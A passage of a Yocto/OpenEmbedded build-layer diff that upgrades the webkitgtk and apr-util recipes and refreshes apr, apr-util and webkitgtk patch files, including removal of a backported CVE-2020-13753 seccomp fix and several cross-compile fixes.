36unintentional. Such casts are not allowed either now. The
37MediaQueryEvaluator's default constructor says it returns true for
38"all", which appears to be the original intent of this call, so I
39replaced it with that.
40(WebCore::Style::Resolver::Resolver):
41
42git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
43
44Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
45
46Signed-off-by: Khem Raj <raj.khem@gmail.com>
47---
48 Source/WebCore/style/StyleResolver.cpp | 2 +-
49 1 file changed, 1 insertion(+), 1 deletion(-)
50
51diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
52index 8bf371a0..34580ddb 100644
53--- a/Source/WebCore/style/StyleResolver.cpp
54+++ b/Source/WebCore/style/StyleResolver.cpp
55@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
56 if (view)
57 m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
58 else
59- m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
60+ m_mediaQueryEvaluator = MediaQueryEvaluator { };
61
62 if (root) {
63 m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
64--
652.28.0
66
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
1Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
2CVE: CVE-2020-13753
3Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
4
5Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
6===================================================================
7--- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262367)
8+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262368)
9@@ -642,5 +642,5 @@
10 int r;
11 if (rule.arg)
12- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
13+ r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
14 else
15 r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index cf6b2ffae7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
19 file://cross-compile.patch \ 19 file://cross-compile.patch \
20 file://0001-Fix-build-with-musl.patch \ 20 file://0001-Fix-build-with-musl.patch \
21 file://include_array.patch \ 21 file://include_array.patch \
22 file://CVE-2020-13753.patch \ 22 file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
23 file://0001-MiniBrowser-Fix-reproduciblity.patch \
23 " 24 "
24SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec" 25SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
25SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
26 26
27inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc 27inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
28 28
diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
1From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
2From: Changqing Li <changqing.li@windriver.com>
3Date: Wed, 12 Sep 2018 17:16:36 +0800
4Subject: [PATCH] Fix error handling in gdbm
5
6Only check for gdbm_errno if the return value of the called gdbm_*
7function says so. This fixes apr-util with gdbm 1.14, which does not
8seem to always reset gdbm_errno.
9
10Also make the gdbm driver return error codes starting with
11APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
12what the berkleydb driver already does.
13
14Also ensure that dsize is 0 if dptr == NULL.
15
16Upstream-Status: Backport[https://svn.apache.org/viewvc?
17view=revision&amp;revision=1825311]
18
19Signed-off-by: Changqing Li <changqing.li@windriver.com>
20---
21 dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
22 1 file changed, 29 insertions(+), 18 deletions(-)
23
24diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
25index 749447a..1c86327 100644
26--- a/dbm/apr_dbm_gdbm.c
27+++ b/dbm/apr_dbm_gdbm.c
28@@ -36,13 +36,25 @@
29 static apr_status_t g2s(int gerr)
30 {
31 if (gerr == -1) {
32- /* ### need to fix this */
33- return APR_EGENERAL;
34+ if (gdbm_errno == GDBM_NO_ERROR)
35+ return APR_SUCCESS;
36+ return APR_OS_START_USEERR + gdbm_errno;
37 }
38
39 return APR_SUCCESS;
40 }
41
42+static apr_status_t gdat2s(datum d)
43+{
44+ if (d.dptr == NULL) {
45+ if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
46+ return APR_SUCCESS;
47+ return APR_OS_START_USEERR + gdbm_errno;
48+ }
49+
50+ return APR_SUCCESS;
51+}
52+
53 static apr_status_t datum_cleanup(void *dptr)
54 {
55 if (dptr)
56@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
57
58 static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
59 {
60- apr_status_t rv = APR_SUCCESS;
61
62- /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
63+ dbm->errcode = dbm_said;
64
65- if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
66+ if (dbm_said == APR_SUCCESS)
67 dbm->errmsg = NULL;
68- }
69- else {
70- dbm->errmsg = gdbm_strerror(gdbm_errno);
71- rv = APR_EGENERAL; /* ### need something better */
72- }
73-
74- /* captured it. clear it now. */
75- gdbm_errno = GDBM_NO_ERROR;
76+ else
77+ dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
78
79- return rv;
80+ return dbm_said;
81 }
82
83 /* --------------------------------------------------------------------------
84@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
85 NULL);
86
87 if (file == NULL)
88- return APR_EGENERAL; /* ### need a better error */
89+ return APR_OS_START_USEERR + gdbm_errno; /* ### need a better error */
90
91 /* we have an open database... return it */
92 *pdb = apr_pcalloc(pool, sizeof(**pdb));
93@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
94 if (pvalue->dptr)
95 apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
96 apr_pool_cleanup_null);
97+ else
98+ pvalue->dsize = 0;
99
100 /* store the error info into DBM, and return a status code. Also, note
101 that *pvalue should have been cleared on error. */
102- return set_error(dbm, APR_SUCCESS);
103+ return set_error(dbm, gdat2s(rd));
104 }
105
106 static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
107@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
108 if (pkey->dptr)
109 apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
110 apr_pool_cleanup_null);
111+ else
112+ pkey->dsize = 0;
113
114 /* store any error info into DBM, and return a status code. */
115- return set_error(dbm, APR_SUCCESS);
116+ return set_error(dbm, gdat2s(rd));
117 }
118
119 static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
120@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
121 if (pkey->dptr)
122 apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
123 apr_pool_cleanup_null);
124+ else
125+ pkey->dsize = 0;
126
127 /* store any error info into DBM, and return a status code. */
128- return set_error(dbm, APR_SUCCESS);
129+ return set_error(dbm, gdat2s(rd));
130 }
131
132 static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
133--
1342.7.4
135
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index f7d827a1d8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,11 +13,9 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
13 file://configfix.patch \ 13 file://configfix.patch \
14 file://configure_fixes.patch \ 14 file://configure_fixes.patch \
15 file://run-ptest \ 15 file://run-ptest \
16 file://0001-Fix-error-handling-in-gdbm.patch \ 16 "
17"
18 17
19SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f" 18SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
20SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
21 19
22EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \ 20EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
23 --without-odbc \ 21 --without-odbc \
@@ -35,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
35do_configure_append() { 33do_configure_append() {
36 if [ "${CLASSOVERRIDE}" = "class-target" ]; then 34 if [ "${CLASSOVERRIDE}" = "class-target" ]; then
37 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk 35 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
36 sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
38 fi 37 fi
39} 38}
40do_configure_prepend_class-native() { 39do_configure_prepend_class-native() {
@@ -49,6 +48,7 @@ do_configure_append_class-native() {
49 48
50do_configure_prepend_class-nativesdk() { 49do_configure_prepend_class-nativesdk() {
51 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk 50 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
51 sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
52} 52}
53 53
54do_configure_append_class-nativesdk() { 54do_configure_append_class-nativesdk() {
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
1From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001 1From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
2From: Jeremy Puhlman <jpuhlman@mvista.com> 2From: Jeremy Puhlman <jpuhlman@mvista.com>
3Date: Thu, 26 Mar 2020 18:30:36 +0000 3Date: Thu, 26 Mar 2020 18:30:36 +0000
4Subject: [PATCH] Add option to disable timed dependant tests 4Subject: [PATCH] Add option to disable timed dependant tests
5 5
6The disabled tests rely on timing to pass correctly. On a virtualized 6The disabled tests rely on timing to pass correctly. On a virtualized
7system under heavy load, these tests randomly fail because they miss 7system under heavy load, these tests randomly fail because they miss
8a timer or other timing related issues. 8a timer or other timing related issues.
9 9
10Upstream-Status: Pending 10Upstream-Status: Pending
11Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com> 11Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
12
12--- 13---
13 configure.in | 6 ++++++ 14 configure.in | 6 ++++++
14 include/apr.h.in | 1 + 15 include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
16 3 files changed, 9 insertions(+), 2 deletions(-) 17 3 files changed, 9 insertions(+), 2 deletions(-)
17 18
18diff --git a/configure.in b/configure.in 19diff --git a/configure.in b/configure.in
19index d9f32d6..f0c5661 100644 20index bfd488b..3663220 100644
20--- a/configure.in 21--- a/configure.in
21+++ b/configure.in 22+++ b/configure.in
22@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks, 23@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
23 ) 24 )
24 AC_SUBST(apr_has_timedlocks) 25 AC_SUBST(apr_has_timedlocks)
25 26
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
45 #define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@ 46 #define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
46 47
47diff --git a/test/testlock.c b/test/testlock.c 48diff --git a/test/testlock.c b/test/testlock.c
48index a43f477..6233d0b 100644 49index e3437c1..04e01b9 100644
49--- a/test/testlock.c 50--- a/test/testlock.c
50+++ b/test/testlock.c 51+++ b/test/testlock.c
51@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite) 52@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
52 abts_run_test(suite, threads_not_impl, NULL); 53 abts_run_test(suite, threads_not_impl, NULL);
53 #else 54 #else
54 abts_run_test(suite, test_thread_mutex, NULL); 55 abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
56+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS 57+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
57 abts_run_test(suite, test_thread_timedmutex, NULL); 58 abts_run_test(suite, test_thread_timedmutex, NULL);
58 #endif 59 #endif
60 abts_run_test(suite, test_thread_nestedmutex, NULL);
61@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
59 abts_run_test(suite, test_thread_rwlock, NULL); 62 abts_run_test(suite, test_thread_rwlock, NULL);
60 abts_run_test(suite, test_cond, NULL); 63 abts_run_test(suite, test_cond, NULL);
61 abts_run_test(suite, test_timeoutcond, NULL); 64 abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
63+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS 66+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
64 abts_run_test(suite, test_timeoutmutex, NULL); 67 abts_run_test(suite, test_timeoutmutex, NULL);
65 #endif 68 #endif
66 #endif 69 #ifdef WIN32
67--
682.23.0
69
diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
1From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 26 Aug 2022 00:28:08 -0700
4Subject: [PATCH] configure: Remove runtime test for mmap that can map
5 /dev/zero
6
7This never works for cross-compile moreover it ends up disabling
8ac_cv_file__dev_zero which then results in compiler errors in shared
9mutexes
10
11Upstream-Status: Inappropriate [Cross-compile specific]
12Signed-off-by: Khem Raj <raj.khem@gmail.com>
13
14---
15 configure.in | 30 ------------------------------
16 1 file changed, 30 deletions(-)
17
18diff --git a/configure.in b/configure.in
19index 3663220..dce9789 100644
20--- a/configure.in
21+++ b/configure.in
22@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
23 APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
24 AC_CHECK_FILE(/dev/zero)
25
26-# Not all systems can mmap /dev/zero (such as HP-UX). Check for that.
27-if test "$ac_cv_func_mmap" = "yes" &&
28- test "$ac_cv_file__dev_zero" = "yes"; then
29- AC_CACHE_CHECK([for mmap that can map /dev/zero],
30- [ac_cv_mmap__dev_zero],
31- [AC_TRY_RUN([#include <sys/types.h>
32-#include <sys/stat.h>
33-#include <fcntl.h>
34-#ifdef HAVE_SYS_MMAN_H
35-#include <sys/mman.h>
36-#endif
37- int main()
38- {
39- int fd;
40- void *m;
41- fd = open("/dev/zero", O_RDWR);
42- if (fd < 0) {
43- return 1;
44- }
45- m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
46- if (m == (void *)-1) { /* aka MAP_FAILED */
47- return 2;
48- }
49- if (munmap(m, sizeof(void*)) < 0) {
50- return 3;
51- }
52- return 0;
53- }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
54-fi
55-
56 # Now we determine which one is our anonymous shmem preference.
57 haveshmgetanon="0"
58 havemmapzero="0"
diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
1From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001 1From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
2From: Hongxu Jia <hongxu.jia@windriver.com> 2From: Hongxu Jia <hongxu.jia@windriver.com>
3Date: Tue, 30 Jan 2018 09:39:06 +0800 3Date: Tue, 30 Jan 2018 09:39:06 +0800
4Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr 4Subject: [PATCH] apr: Remove workdir path references from installed apr files
5 files
6 5
7Upstream-Status: Inappropriate [configuration] 6Upstream-Status: Inappropriate [configuration]
8 7
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
14Rebase to 1.6.3 13Rebase to 1.6.3
15 14
16Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> 15Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
16
17--- 17---
18 apr-config.in | 26 ++------------------------ 18 apr-config.in | 32 ++------------------------------
19 1 file changed, 2 insertions(+), 24 deletions(-) 19 1 file changed, 2 insertions(+), 30 deletions(-)
20 20
21diff --git a/apr-config.in b/apr-config.in 21diff --git a/apr-config.in b/apr-config.in
22index 84b4073..bbbf651 100644 22index bed47ca..47874e5 100644
23--- a/apr-config.in 23--- a/apr-config.in
24+++ b/apr-config.in 24+++ b/apr-config.in
25@@ -152,14 +152,7 @@ while test $# -gt 0; do 25@@ -164,16 +164,7 @@ while test $# -gt 0; do
26 flags="$flags $LDFLAGS" 26 flags="$flags $LDFLAGS"
27 ;; 27 ;;
28 --includes) 28 --includes)
29- if test "$location" = "installed"; then 29- if test "$location" = "installed"; then
30 flags="$flags -I$includedir $EXTRA_INCLUDES" 30 flags="$flags -I$includedir $EXTRA_INCLUDES"
31- elif test "$location" = "crosscompile"; then
32- flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
31- elif test "$location" = "source"; then 33- elif test "$location" = "source"; then
32- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES" 34- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
33- else 35- else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
37 ;; 39 ;;
38 --srcdir) 40 --srcdir)
39 echo $APR_SOURCE_DIR 41 echo $APR_SOURCE_DIR
40@@ -181,29 +174,14 @@ while test $# -gt 0; do 42@@ -197,33 +188,14 @@ while test $# -gt 0; do
41 exit 0 43 exit 0
42 ;; 44 ;;
43 --link-ld) 45 --link-ld)
44- if test "$location" = "installed"; then 46- if test "$location" = "installed"; then
45- ### avoid using -L if libdir is a "standard" location like /usr/lib 47- ### avoid using -L if libdir is a "standard" location like /usr/lib
46- flags="$flags -L$libdir -l${APR_LIBNAME}" 48- flags="$flags -L$libdir -l${APR_LIBNAME}"
49- elif test "$location" = "crosscompile"; then
50- flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
47- else 51- else
48- ### this surely can't work since the library is in .libs? 52- ### this surely can't work since the library is in .libs?
49- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}" 53- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
62- # Since the user is specifying they are linking with libtool, we 66- # Since the user is specifying they are linking with libtool, we
63- # *know* that -R will be recognized by libtool. 67- # *know* that -R will be recognized by libtool.
64- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}" 68- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
69- elif test "$location" = "crosscompile"; then
70- flags="$flags -L${APR_TARGET_DIR}/$libdir -l${APR_LIBNAME}"
65- else 71- else
66- flags="$flags $LA_FILE" 72- flags="$flags $LA_FILE"
67- fi 73- fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
69 ;; 75 ;;
70 --shlib-path-var) 76 --shlib-path-var)
71 echo "$SHLIBPATH_VAR" 77 echo "$SHLIBPATH_VAR"
72--
731.8.3.1
74
diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
1From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
2From: Hongxu Jia <hongxu.jia@windriver.com>
3Date: Fri, 2 Feb 2018 15:51:42 +0800
4Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
5
6While cross compiling, the tools/gen_test_char could not
7be executed at build time, use AX_PROG_CC_FOR_BUILD to
8build native tools/gen_test_char
9
10Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
11
12Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
13---
14 Makefile.in | 10 +++-------
15 configure.in | 3 +++
16 2 files changed, 6 insertions(+), 7 deletions(-)
17
18diff --git a/Makefile.in b/Makefile.in
19index 5fb760e..8675f90 100644
20--- a/Makefile.in
21+++ b/Makefile.in
22@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
23
24 CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
25 build/apr_rules.out tools/gen_test_char@EXEEXT@ \
26- tools/gen_test_char.o tools/gen_test_char.lo \
27+ tools/gen_test_char.o \
28 include/private/apr_escape_test_char.h
29 DISTCLEAN_TARGETS = config.cache config.log config.status \
30 include/apr.h include/arch/unix/apr_private.h \
31@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
32 etags:
33 etags `find . -name '*.[ch]'`
34
35-OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
36-tools/gen_test_char.lo: tools/gen_test_char.c
37+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
38 $(APR_MKDIR) tools
39- $(LT_COMPILE)
40-
41-tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
42- $(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
43+ $(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
44
45 include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
46 $(APR_MKDIR) include/private
47diff --git a/configure.in b/configure.in
48index 719f331..361120f 100644
49--- a/configure.in
50+++ b/configure.in
51@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
52 dnl preload section from invoking the macro to get compiler info.
53 AC_PROG_CC
54
55+dnl Check build CC for gen_test_char compiling which is executed at build time.
56+AX_PROG_CC_FOR_BUILD
57+
58 dnl AC_PROG_SED is only avaliable in recent autoconf versions.
59 dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
60 ifdef([AC_PROG_SED],
61--
621.8.3.1
63
diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
1From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
2From: Dengke Du <dengke.du@windriver.com>
3Date: Wed, 14 Dec 2016 18:13:08 +0800
4Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
5 compiling
6
7In configure.in, it contains the following:
8
9 APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
10
11the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
12it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
13compiling enable.
14
15So it was hardcoded for cross compiling, we should detect it dynamic based on
16the sysroot's glibc. We change it to the following:
17
18 AC_CHECK_SIZEOF(off_t)
19
20The same for the following hardcoded types for cross compiling:
21
22 pid_t 8
23 ssize_t 8
24 size_t 8
25 off_t 8
26
27Change the above correspondingly.
28
29Signed-off-by: Dengke Du <dengke.du@windriver.com>
30
31Upstream-Status: Pending
32
33---
34 configure.in | 8 ++++----
35 1 file changed, 4 insertions(+), 4 deletions(-)
36
37diff --git a/configure.in b/configure.in
38index 27b8539..fb408d1 100644
39--- a/configure.in
40+++ b/configure.in
41@@ -1801,7 +1801,7 @@ else
42 socklen_t_value="int"
43 fi
44
45-APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
46+AC_CHECK_SIZEOF(pid_t)
47
48 if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
49 pid_t_fmt='#define APR_PID_T_FMT "hd"'
50@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
51 APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
52 ])
53
54-APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
55+AC_CHECK_SIZEOF(ssize_t)
56
57 dnl the else cases below should no longer occur;
58 AC_MSG_CHECKING([which format to use for apr_ssize_t])
59@@ -1891,7 +1891,7 @@ fi
60
61 ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
62
63-APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
64+AC_CHECK_SIZEOF(size_t)
65
66 # else cases below should no longer occur;
67 AC_MSG_CHECKING([which format to use for apr_size_t])
68@@ -1909,7 +1909,7 @@ fi
69
70 size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
71
72-APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
73+AC_CHECK_SIZEOF(off_t)
74
75 if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
76 # Enable LFS
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
1From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
1From: Helmut Grohne <helmut@subdivi.de> 2From: Helmut Grohne <helmut@subdivi.de>
2Subject: check for libtoolize rather than libtool 3Date: Tue, 7 Feb 2023 07:04:00 +0000
3Last-Update: 2014-09-19 4Subject: [PATCH] check for libtoolize rather than libtool
4 5
5libtool is now in package libtool-bin, but apr only needs libtoolize. 6libtool is now in package libtool-bin, but apr only needs libtoolize.
6 7
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
8 9
9Signed-off-by: Robert Yang <liezhi.yang@windriver.com> 10Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
10 11
11--- apr.orig/build/buildcheck.sh 12---
12+++ apr/build/buildcheck.sh 13 build/buildcheck.sh | 10 ++++------
